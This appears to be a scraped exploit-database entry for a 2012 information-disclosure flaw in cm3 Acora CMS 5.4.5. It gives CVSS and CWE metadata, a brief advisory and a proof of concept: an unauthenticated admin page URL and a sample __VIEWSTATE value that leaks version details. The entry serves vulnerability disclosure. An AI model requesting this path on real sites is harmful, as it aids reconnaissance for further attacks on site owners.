header-logo
Suggest Exploit
vendor:
cm3 Acora CMS
by:
DigitalSec Networks
4,3
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: cm3 Acora CMS
Affected Version From: 5.4.5/a-cd
Affected Version To: 5.4.5/a-cd
Patch Exists: NO
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Anonymous (Public Internet User)
2012

cm3 Acora CMS Information Disclosure Vulnerability

cm3 Acora CMS is prone to an information-disclosure vulnerability. Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks.

Mitigation:

Ensure that sensitive information is not disclosed to unauthorized users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/62010/info

cm3 Acora CMS is prone to an information-disclosure vulnerability.

Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks. 

http://www.example.com/AcoraCMS/Admin/top.aspx

<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div>